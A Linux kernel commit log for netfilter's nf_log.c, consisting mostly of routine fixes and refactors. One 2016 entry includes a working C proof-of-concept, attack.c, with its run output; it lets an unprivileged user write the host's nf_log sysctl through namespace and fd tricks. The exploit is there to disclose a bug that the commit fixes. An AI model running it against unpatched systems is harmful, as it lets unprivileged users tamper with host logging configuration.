27 Apr, 2020
1 commit
-
Instead of having all the sysctl handlers deal with user pointers, which
is rather hairy in terms of the BPF interaction, copy the input to and
from userspace in common code. This also means that the strings are
always NUL-terminated by the common code, making the API a little bit
safer.As most handler just pass through the data to one of the common handlers
a lot of the changes are mechnical.Signed-off-by: Christoph Hellwig
Acked-by: Andrey Ignatov
Signed-off-by: Al Viro
04 Jul, 2019
1 commit
-
A string which did not contain a data format specification should be put
into a sequence. Thus use the corresponding function “seq_puts”.This issue was detected by using the Coccinelle software.
Signed-off-by: Markus Elfring
Signed-off-by: Pablo Neira Ayuso
21 May, 2019
1 commit
-
Add SPDX license identifiers to all files which:
- Have no license information of any form
- Have EXPORT_.*_SYMBOL_GPL inside which was used in the
initial scan/conversion to ignore the fileThese files fall under the project license, GPL v2 only. The resulting SPDX
license identifier is:GPL-2.0-only
Signed-off-by: Thomas Gleixner
Signed-off-by: Greg Kroah-Hartman
26 Jun, 2018
2 commits
-
The old code would indefinitely block other users of nf_log_mutex if
a userspace access in proc_dostring() blocked e.g. due to a userfaultfd
region. Fix it by moving proc_dostring() out of the locked region.This is a followup to commit 266d07cb1c9a ("netfilter: nf_log: fix
sleeping function called from invalid context"), which changed this code
from using rcu_read_lock() to taking nf_log_mutex.Fixes: 266d07cb1c9a ("netfilter: nf_log: fix sleeping function calle[...]")
Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso -
When proc_dostring() is called with a non-zero offset in strict mode, it
doesn't just write to the ->data buffer, it also reads. Make sure it
doesn't read uninitialized data.Fixes: c6ac37d8d884 ("netfilter: nf_log: fix error on write NONE to [...]")
Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso
16 May, 2018
1 commit
-
Variants of proc_create{,_data} that directly take a struct seq_operations
and deal with network namespaces in ->open and ->release. All callers of
proc_create + seq_open_net converted over, and seq_{open,release}_net are
removed entirely.Signed-off-by: Christoph Hellwig
28 Mar, 2018
1 commit
-
Synchronous pernet_operations are not allowed anymore.
All are asynchronous. So, drop the structure member.Signed-off-by: Kirill Tkhai
Signed-off-by: David S. Miller
27 Mar, 2018
1 commit
-
Prefer the direct use of octal for permissions.
Done with checkpatch -f --types=SYMBOLIC_PERMS --fix-inplace
and some typing.Miscellanea:
o Whitespace neatening around these conversions.
Signed-off-by: Joe Perches
Signed-off-by: David S. Miller
13 Feb, 2018
1 commit
-
The pernet_operations would have had a problem in parallel
execution with others, if init_net had been able to released.
But it's not, and the rest is safe for that.
There is memory allocation, which nobody else interested in,
and sysctl registration. So, we make them async.Signed-off-by: Kirill Tkhai
Acked-by: Andrei Vagin
Signed-off-by: David S. Miller
19 Jan, 2018
1 commit
-
/proc has been ignoring struct file_operations::owner field for 10 years.
Specifically, it started with commit 786d7e1612f0b0adb6046f19b906609e4fe8b1ba
("Fix rmmod/read/write races in /proc entries"). Notice the chunk where
inode->i_fop is initialized with proxy struct file_operations for
regular files:- if (de->proc_fops)
- inode->i_fop = de->proc_fops;
+ if (de->proc_fops) {
+ if (S_ISREG(inode->i_mode))
+ inode->i_fop = &proc_reg_file_ops;
+ else
+ inode->i_fop = de->proc_fops;
+ }VFS stopped pinning module at this point.
# ipvs
Acked-by: Julian Anastasov
Signed-off-by: Alexey Dobriyan
Acked-by: Simon Horman
Signed-off-by: Pablo Neira Ayuso
01 May, 2017
1 commit
-
nf_log_unregister() (which is what gets called in the logger backends
module exit paths) does a (required, module is removed) synchronize_rcu().But nf_log_unset() is only called from pernet exit handlers. It doesn't
free any memory so there appears to be no need to call synchronize_rcu.v2: Liping Zhang points out that nf_log_unregister() needs to be called
after pernet unregister, else rmmod would become unsafe.Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso
07 Apr, 2017
1 commit
-
For string without format specifiers, use seq_puts(). For
seq_printf("\n"), use seq_putc('\n').Signed-off-by: simran singhal
Acked-by: Simon Horman
Signed-off-by: Pablo Neira Ayuso
04 Feb, 2017
1 commit
-
Pablo Neira Ayuso says:
====================
Netfilter updates for net-nextThe following patchset contains Netfilter updates for your net-next
tree, they are:1) Stash ctinfo 3-bit field into pointer to nf_conntrack object from
sk_buff so we only access one single cacheline in the conntrack
hotpath. Patchset from Florian Westphal.2) Don't leak pointer to internal structures when exporting x_tables
ruleset back to userspace, from Willem DeBruijn. This includes new
helper functions to copy data to userspace such as xt_data_to_user()
as well as conversions of our ip_tables, ip6_tables and arp_tables
clients to use it. Not surprinsingly, ebtables requires an ad-hoc
update. There is also a new field in x_tables extensions to indicate
the amount of bytes that we copy to userspace.3) Add nf_log_all_netns sysctl: This new knob allows you to enable
logging via nf_log infrastructure for all existing netnamespaces.
Given the effort to provide pernet syslog has been discontinued,
let's provide a way to restore logging using netfilter kernel logging
facilities in trusted environments. Patch from Michal Kubecek.4) Validate SCTP checksum from conntrack helper, from Davide Caratti.
5) Merge UDPlite conntrack and NAT helpers into UDP, this was mostly
a copy&paste from the original helper, from Florian Westphal.6) Reset netfilter state when duplicating packets, also from Florian.
7) Remove unnecessary check for broadcast in IPv6 in pkttype match and
nft_meta, from Liping Zhang.8) Add missing code to deal with loopback packets from nft_meta when
used by the netdev family, also from Liping.9) Several cleanups on nf_tables, one to remove unnecessary check from
the netlink control plane path to add table, set and stateful objects
and code consolidation when unregister chain hooks, from Gao Feng.10) Fix harmless reference counter underflow in IPVS that, however,
results in problems with the introduction of the new refcount_t
type, from David Windsor.11) Enable LIBCRC32C from nf_ct_sctp instead of nf_nat_sctp,
from Davide Caratti.12) Missing documentation on nf_tables uapi header, from Liping Zhang.
13) Use rb_entry() helper in xt_connlimit, from Geliang Tang.
====================Signed-off-by: David S. Miller
02 Feb, 2017
1 commit
-
Commit 69b34fb996b2 ("netfilter: xt_LOG: add net namespace support for
xt_LOG") disabled logging packets using the LOG target from non-init
namespaces. The motivation was to prevent containers from flooding
kernel log of the host. The plan was to keep it that way until syslog
namespace implementation allows containers to log in a safe way.However, the work on syslog namespace seems to have hit a dead end
somewhere in 2013 and there are users who want to use xt_LOG in all
network namespaces. This patch allows to do so by setting/proc/sys/net/netfilter/nf_log_all_netns
to a nonzero value. This sysctl is only accessible from init_net so that
one cannot switch the behaviour from inside a container.Signed-off-by: Michal Kubecek
Signed-off-by: Pablo Neira Ayuso
25 Jan, 2017
1 commit
-
First, log prefix will be truncated to NF_LOG_PREFIXLEN-1, i.e. 127,
at nf_log_packet(), so the extra part is useless.Second, after adding a log rule with a very very long prefix, we will
fail to dump the nft rules after this _special_ one, but acctually,
they do exist. For example:
# name_65000=$(printf "%0.sQ" {1..65000})
# nft add rule filter output log prefix "$name_65000"
# nft add rule filter output counter
# nft add rule filter output counter
# nft list chain filter output
table ip filter {
chain output {
type filter hook output priority 0; policy accept;
}
}So now, restrict the log prefix length to NF_LOG_PREFIXLEN-1.
Fixes: 96518518cc41 ("netfilter: add nftables")
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso
04 Oct, 2016
1 commit
-
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#includechar child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}int main(void) {
outer_uid = getuid();
outer_gid = getgid();int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONEBecause this looks like an issue with very low severity, I'm sending it to
the public list directly.Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso
30 Aug, 2016
1 commit
-
The nf_log_set is an interface function, so it should do the strict sanity
check of parameters. Convert the return value of nf_log_set as int instead
of void. When the pf is invalid, return -EOPNOTSUPP.Signed-off-by: Gao Feng
Signed-off-by: Pablo Neira Ayuso
05 Jul, 2016
1 commit
-
It is hard to unbind nf-logger:
echo NONE > /proc/sys/net/netfilter/nf_log/0
bash: echo: write error: No such file or directorysysctl -w net.netfilter.nf_log.0=NONE
sysctl: setting key "net.netfilter.nf_log.0": No such file or directory
net.netfilter.nf_log.0 = NONEYou need explicitly send '\0', for instance like:
echo -e "NONE\0" > /proc/sys/net/netfilter/nf_log/0
That seem to be strange, so fix it using proc_dostring.
Now it works fine:
modprobe nfnetlink_log
echo nfnetlink_log > /proc/sys/net/netfilter/nf_log/0
cat /proc/sys/net/netfilter/nf_log/0
nfnetlink_log
echo NONE > /proc/sys/net/netfilter/nf_log/0
cat /proc/sys/net/netfilter/nf_log/0
NONEv2: add missed error check for proc_dostring
Signed-off-by: Pavel Tikhomirov
Signed-off-by: Pablo Neira Ayuso
23 Jun, 2016
2 commits
-
If 'logger' was NULL, there would be a direct jump to the label 'out',
since it has already been checked for NULL, remove this unnecessary
check.Signed-off-by: Shivani Bhardwaj
Signed-off-by: Pablo Neira Ayuso -
When we request NFPROTO_INET, it means both NFPROTO_IPV4 and NFPROTO_IPV6.
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso
17 Sep, 2015
1 commit
-
The nf_log_unregister() function needs to call synchronize_rcu() to make sure
that the objects are not dereferenced anymore on module removal.Fixes: 5962815a6a56 ("netfilter: nf_log: use an array of loggers instead of list")
Signed-off-by: Pablo Neira Ayuso
14 Sep, 2015
1 commit
-
like nf_log_unset, nf_log_unregister must not reset the list of loggers.
Otherwise, a call to nf_log_unregister() will render loggers of other nf
protocols unusable:iptables -A INPUT -j LOG
modprobe nf_log_arp ; rmmod nf_log_arp
iptables -A INPUT -j LOG
iptables: No chain/target/match by that nameFixes: 30e0c6a6be ("netfilter: nf_log: prepare net namespace support for loggers")
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso
19 Mar, 2015
1 commit
-
Since fab4085 ("netfilter: log: nf_log_packet() as real unified
interface"), the loginfo structure that is passed to nf_log_packet() is
used to explicitly indicate the logger type you want to use.This is a problem for people tracing rules through nfnetlink_log since
packets are always routed to the NF_LOG_TYPE logger after the
aforementioned patch.We can fix this by removing the trace loginfo structures, but that still
changes the log level from 4 to 5 for tracing messages and there may be
someone relying on this outthere. So let's just introduce a new
nf_log_trace() function that restores the former behaviour.Reported-by: Markus Kötter
Signed-off-by: Pablo Neira Ayuso
23 Dec, 2014
1 commit
-
sizeof(char) is always 1.
Suggested-by: Joe Perches
Signed-off-by: Fabian Frederick
Signed-off-by: Pablo Neira Ayuso
12 Dec, 2014
1 commit
-
Pull networking updates from David Miller:
1) New offloading infrastructure and example 'rocker' driver for
offloading of switching and routing to hardware.This work was done by a large group of dedicated individuals, not
limited to: Scott Feldman, Jiri Pirko, Thomas Graf, John Fastabend,
Jamal Hadi Salim, Andy Gospodarek, Florian Fainelli, Roopa Prabhu2) Start making the networking operate on IOV iterators instead of
modifying iov objects in-situ during transfers. Thanks to Al Viro
and Herbert Xu.3) A set of new netlink interfaces for the TIPC stack, from Richard
Alpe.4) Remove unnecessary looping during ipv6 routing lookups, from Martin
KaFai Lau.5) Add PAUSE frame generation support to gianfar driver, from Matei
Pavaluca.6) Allow for larger reordering levels in TCP, which are easily
achievable in the real world right now, from Eric Dumazet.7) Add a variable of napi_schedule that doesn't need to disable cpu
interrupts, from Eric Dumazet.8) Use a doubly linked list to optimize neigh_parms_release(), from
Nicolas Dichtel.9) Various enhancements to the kernel BPF verifier, and allow eBPF
programs to actually be attached to sockets. From Alexei
Starovoitov.10) Support TSO/LSO in sunvnet driver, from David L Stevens.
11) Allow controlling ECN usage via routing metrics, from Florian
Westphal.12) Remote checksum offload, from Tom Herbert.
13) Add split-header receive, BQL, and xmit_more support to amd-xgbe
driver, from Thomas Lendacky.14) Add MPLS support to openvswitch, from Simon Horman.
15) Support wildcard tunnel endpoints in ipv6 tunnels, from Steffen
Klassert.16) Do gro flushes on a per-device basis using a timer, from Eric
Dumazet. This tries to resolve the conflicting goals between the
desired handling of bulk vs. RPC-like traffic.17) Allow userspace to ask for the CPU upon what a packet was
received/steered, via SO_INCOMING_CPU. From Eric Dumazet.18) Limit GSO packets to half the current congestion window, from Eric
Dumazet.19) Add a generic helper so that all drivers set their RSS keys in a
consistent way, from Eric Dumazet.20) Add xmit_more support to enic driver, from Govindarajulu
Varadarajan.21) Add VLAN packet scheduler action, from Jiri Pirko.
22) Support configurable RSS hash functions via ethtool, from Eyal
Perry.* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next: (1820 commits)
Fix race condition between vxlan_sock_add and vxlan_sock_release
net/macb: fix compilation warning for print_hex_dump() called with skb->mac_header
net/mlx4: Add support for A0 steering
net/mlx4: Refactor QUERY_PORT
net/mlx4_core: Add explicit error message when rule doesn't meet configuration
net/mlx4: Add A0 hybrid steering
net/mlx4: Add mlx4_bitmap zone allocator
net/mlx4: Add a check if there are too many reserved QPs
net/mlx4: Change QP allocation scheme
net/mlx4_core: Use tasklet for user-space CQ completion events
net/mlx4_core: Mask out host side virtualization features for guests
net/mlx4_en: Set csum level for encapsulated packets
be2net: Export tunnel offloads only when a VxLAN tunnel is created
gianfar: Fix dma check map error when DMA_API_DEBUG is enabled
cxgb4/csiostor: Don't use MASTER_MUST for fw_hello call
net: fec: only enable mdio interrupt before phy device link up
net: fec: clear all interrupt events to support i.MX6SX
net: fec: reset fep link status in suspend function
net: sock: fix access via invalid file descriptor
net: introduce helper macro for_each_cmsghdr
...
06 Nov, 2014
1 commit
-
The return value of seq_printf() is soon to be removed. Remove the
checks from seq_printf() in favor of seq_has_overflowed().Link: http://lkml.kernel.org/r/20141104142236.GA10239@salvia
Acked-by: Pablo Neira Ayuso
Cc: Patrick McHardy
Cc: Jozsef Kadlecsik
Cc: netfilter-devel@vger.kernel.org
Cc: coreteam@netfilter.org
Signed-off-by: Steven Rostedt
05 Nov, 2014
1 commit
-
net/netfilter/nf_log.c:157:16: warning: incorrect type in assignment (different address spaces)
net/netfilter/nf_log.c:157:16: expected struct nf_logger *logger
net/netfilter/nf_log.c:157:16: got struct nf_logger [noderef] *Signed-off-by: Pablo Neira Ayuso
30 Oct, 2014
2 commits
-
Currently, despite the comment right before the function,
nf_log_register allows registering two loggers on with the same type and
end up overwriting the previous register.Not a real issue today as current tree doesn't have two loggers for the
same type but it's better to get this protected.Also make sure that all of its callers do error checking.
Signed-off-by: Marcelo Ricardo Leitner
Signed-off-by: Pablo Neira Ayuso -
Wrap up a common call pattern in an easier to handle call.
Signed-off-by: Marcelo Ricardo Leitner
Signed-off-by: Pablo Neira Ayuso
14 Oct, 2014
1 commit
-
The kernel used to contain two functions for length-delimited,
case-insensitive string comparison, strnicmp with correct semantics and
a slightly buggy strncasecmp. The latter is the POSIX name, so strnicmp
was renamed to strncasecmp, and strnicmp made into a wrapper for the new
strncasecmp to avoid breaking existing users.To allow the compat wrapper strnicmp to be removed at some point in the
future, and to avoid the extra indirection cost, do
s/strnicmp/strncasecmp/g.Signed-off-by: Rasmus Villemoes
Cc: "David S. Miller"
Signed-off-by: Andrew Morton
Signed-off-by: Linus Torvalds
27 Jun, 2014
2 commits
-
This adds the generic plain text packet loggger for bridged packets.
It routes the logging message to the real protocol packet logger.
I decided not to refactor the ebt_log code for two reasons:1) The ebt_log output is not consistent with the IPv4 and IPv6
Netfilter packet loggers. The output is different for no good
reason and it adds redundant code to handle packet logging.2) To avoid breaking backward compatibility for applications
outthere that are parsing the specific ebt_log output, the ebt_log
output has been left as is. So only nftables will use the new
consistent logging format for logged bridged packets.More decisions coming in this patch:
1) This also removes ebt_log as default logger for bridged packets.
Thus, nf_log_packet() routes packet to this new packet logger
instead. This doesn't break backward compatibility since
nf_log_packet() is not used to log packets in plain text format
from anywhere in the ebtables/netfilter bridge code.2) The new bridge packet logger also performs a lazy request to
register the real IPv4, ARP and IPv6 netfilter packet loggers.
If the real protocol logger is no available (not compiled or the
module is not available in the system, not packet logging happens.Signed-off-by: Pablo Neira Ayuso
-
Before this patch, the nf_loginfo parameter specified the logging
configuration in case the specified default logger was loaded. This
patch updates the semantics of the nf_loginfo parameter in
nf_log_packet() which now indicates the logger that you explicitly
want to use.Thus, nf_log_packet() is exposed as an unified interface which
internally routes the log message to the corresponding logger type
by family.The module dependencies are expressed by the new nf_logger_find_get()
and nf_logger_put() functions which bump the logger module refcount.
Thus, you can not remove logger modules that are used by rules anymore.Another important effect of this change is that the family specific
module is only loaded when required. Therefore, xt_LOG and nft_log
will just trigger the autoload of the nf_log_{ip,ip6} modules
according to the family.Signed-off-by: Pablo Neira Ayuso
26 Jun, 2014
2 commits
-
This patch moves Eric Dumazet's log buffer implementation from the
xt_log.h header file to the core net/netfilter/nf_log.c. This also
includes the renaming of the structure and functions to avoid possible
undesired namespace clashes.This change allows us to use it from the arp and bridge packet logging
implementation in follow up patches. -
Now that legacy ulog targets are not available anymore in the tree, we
can have up to two possible loggers:1) The plain text logging via kernel logging ring.
2) The nfnetlink_log infrastructure which delivers log messages
to userspace.This patch replaces the list of loggers by an array of two pointers
per family for each possible logger and it also introduces a new field
to the nf_logger structure which indicates the position in the logger
array (based on the logger type).This prepares a follow up patch that consolidates the nf_log_packet()
interface by allowing to specify the logger as parameter.Signed-off-by: Pablo Neira Ayuso
13 Jun, 2013
1 commit
-
Reduce the uses of this unnecessary typedef.
Done via perl script:
$ git grep --name-only -w ctl_table net | \
xargs perl -p -i -e '\
sub trim { my ($local) = @_; $local =~ s/(^\s+|\s+$)//g; return $local; } \
s/\b(?<!struct\s)ctl_table\b(\s*\*\s*|\s+\w+)/"struct ctl_table " . trim($1)/ge'Reflow the modified lines that now exceed 80 columns.
Signed-off-by: Joe Perches
Signed-off-by: David S. Miller
06 Jun, 2013
1 commit
-
Conflicts:
net/netfilter/nf_log.cThe conflict in nf_log.c is that in 'net' we added CONFIG_PROC_FS
protection around foo_proc_entry() calls to fix a build failure,
whereas in Pablo's tree a guard if() test around a call is
remove_proc_entry() was removed. Trivially resolved.Pablo Neira Ayuso says:
====================
The following patchset contains the first batch of
Netfilter/IPVS updates for your net-next tree, they are:* Three patches with improvements and code refactorization
for nfnetlink_queue, from Florian Westphal.* FTP helper now parses replies without brackets, as RFC1123
recommends, from Jeff Mahoney.* Rise a warning to tell everyone about ULOG deprecation,
NFLOG has been already in the kernel tree for long time
and supersedes the old logging over netlink stub, from
myself.* Don't panic if we fail to load netfilter core framework,
just bail out instead, from myself.* Add cond_resched_rcu, used by IPVS to allow rescheduling
while walking over big hashtables, from Simon Horman.* Change type of IPVS sysctl_sync_qlen_max sysctl to avoid
possible overflow, from Zhang Yanfei.* Use strlcpy instead of strncpy to skip zeroing of already
initialized area to write the extension names in ebtables,
from Chen Gang.* Use already existing per-cpu notrack object from xt_CT,
from Eric Dumazet.* Save explicit socket lookup in xt_socket now that we have
early demux, also from Eric Dumazet.
====================Signed-off-by: David S. Miller
23 May, 2013
1 commit
-
Don't panic if we hit an error while adding the nf_log or pernet
netfilter support, just bail out.Signed-off-by: Pablo Neira Ayuso
Acked-by: Gao feng
15 May, 2013
1 commit
-
Since (69b34fb netfilter: xt_LOG: add net namespace support
for xt_LOG), we hit this:[ 4224.708977] BUG: unable to handle kernel NULL pointer dereference at 0000000000000388
[ 4224.709074] IP: [] ipt_log_packet+0x29/0x270when callling log functions from conntrack both in and out
are NULL i.e. the net pointer is invalid.Adding struct net *net in call to nf_logfn() will secure that
there always is a vaild net ptr.Reported as netfilter's bugzilla bug 818:
https://bugzilla.netfilter.org/show_bug.cgi?id=818Reported-by: Ronald
Signed-off-by: Hans Schillstrom
Signed-off-by: Pablo Neira Ayuso
06 May, 2013
1 commit
-
This patch fixes the following compilation error:
net/netfilter/nf_log.c:373:38: error: 'struct netns_nf' has no member named 'proc_netfilter'
if procfs is not set.
The netns support for nf_log, nfnetlink_log and nfnetlink_queue_core
requires CONFIG_PROC_FS in the removal path of their respective
/proc interface since net->nf.proc_netfilter is undefined in that
case.Reported-by: Fengguang Wu
Signed-off-by: Pablo Neira Ayuso
Acked-by: Gao feng
06 Apr, 2013
1 commit
-
After this patch, all nf_loggers support net namespace. Still
xt_LOG and ebt_log require syslog netns support.Signed-off-by: Gao feng
Signed-off-by: Pablo Neira Ayuso
